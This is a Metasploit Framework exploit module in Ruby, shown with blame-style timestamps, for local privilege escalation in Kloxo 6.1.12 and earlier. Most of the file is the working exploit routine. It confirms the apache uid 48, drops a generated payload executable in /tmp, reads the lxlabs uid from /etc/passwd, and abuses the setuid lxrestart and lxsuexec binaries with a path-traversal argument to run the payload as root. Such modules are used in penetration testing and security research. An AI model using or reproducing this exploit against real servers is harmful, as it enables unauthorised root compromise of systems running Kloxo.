2013-05-13 23:08:23 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/common'
|
|
|
|
require 'msf/core/exploit/local/linux'
|
|
|
|
require 'msf/core/exploit/exe'
|
|
|
|
|
|
|
|
class Metasploit4 < Msf::Exploit::Local
|
|
|
|
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Common
|
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
|
|
|
include Msf::Exploit::Local::Linux
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info, {
|
|
|
|
'Name' => 'Kloxo Local Privilege Escalation',
|
|
|
|
'Description' => %q{
|
2013-05-14 19:20:27 +00:00
|
|
|
Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as
|
|
|
|
lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,
|
|
|
|
Apache by default on CentOS 5.8, the operating system supported by Kloxo.
|
|
|
|
This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.
|
2013-05-13 23:08:23 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'HTP', # Original PoC according to exploit-db
|
|
|
|
'juan vazquez' # Metasploit module
|
|
|
|
],
|
|
|
|
'Platform' => [ 'linux' ],
|
|
|
|
'Arch' => [ ARCH_X86 ],
|
|
|
|
'SessionTypes' => [ 'shell' ],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 8000,
|
|
|
|
'DisableNops' => true
|
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'EDB', '25406' ],
|
2013-06-02 13:33:42 +00:00
|
|
|
[ 'OSVDB', '93287' ],
|
2013-05-13 23:08:23 +00:00
|
|
|
[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
|
|
|
|
],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2013-05-14 00:09:06 +00:00
|
|
|
[ 'Kloxo 6.1.12', {} ]
|
2013-05-13 23:08:23 +00:00
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'PrependSetuid' => true
|
|
|
|
},
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'Privileged' => true,
|
|
|
|
'DisclosureDate' => "Sep 18 2012"
|
|
|
|
}))
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
# apache uid (48) is needed in order to abuse the setuid lxsuexec binary
|
|
|
|
# .text:0804869D call _getuid
|
|
|
|
# .text:080486A2 cmp eax, 48
|
|
|
|
# .text:080486A5 jz short loc_80486B6 // uid == 48 (typically apache on CentOS)
|
|
|
|
# .text:080486A7 mov [ebp+var_A4], 0Ah
|
|
|
|
# .text:080486B1 jmp loc_8048B62 // finish if uid != 48
|
|
|
|
# .text:08048B62 loc_8048B62: ; CODE XREF: main+39j
|
|
|
|
#.text:08048B62 ; main+B0j
|
|
|
|
#.text:08048B62 mov eax, [ebp+var_A4]
|
|
|
|
#.text:08048B68 add esp, 0ECh
|
|
|
|
#.text:08048B6E pop ecx
|
|
|
|
#.text:08048B6F pop esi
|
|
|
|
#.text:08048B70 pop edi
|
|
|
|
#.text:08048B71 pop ebp
|
|
|
|
#.text:08048B72 lea esp, [ecx-4]
|
|
|
|
#.text:08048B75 retn
|
|
|
|
#.text:08048B75 main endp
|
|
|
|
print_status("Checking actual uid...")
|
|
|
|
id = cmd_exec("id -u")
|
|
|
|
if id != "48"
|
|
|
|
fail_with(Exploit::Failure::NoAccess, "You are uid #{id}, you must be uid 48(apache) to exploit this")
|
|
|
|
end
|
|
|
|
|
|
|
|
# Write msf payload to /tmp and give provide executable perms
|
|
|
|
pl = generate_payload_exe
|
|
|
|
payload_path = "/tmp/#{rand_text_alpha(4)}"
|
|
|
|
print_status("Writing payload executable (#{pl.length} bytes) to #{payload_path} ...")
|
|
|
|
write_file(payload_path, pl)
|
|
|
|
register_file_for_cleanup(payload_path)
|
|
|
|
|
|
|
|
# Profit
|
|
|
|
print_status("Exploiting...")
|
|
|
|
cmd_exec("chmod +x #{payload_path}")
|
|
|
|
cmd_exec("LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`")
|
|
|
|
cmd_exec("export MUID=$LXLABS")
|
|
|
|
cmd_exec("export GID=$LXLABS")
|
|
|
|
cmd_exec("export TARGET=/bin/sh")
|
|
|
|
cmd_exec("export CHECK_GID=0")
|
|
|
|
cmd_exec("export NON_RESIDENT=1")
|
|
|
|
helper_path = "/tmp/#{rand_text_alpha(4)}"
|
|
|
|
write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")
|
|
|
|
register_file_for_cleanup(helper_path)
|
|
|
|
cmd_exec("lxsuexec #{helper_path}")
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|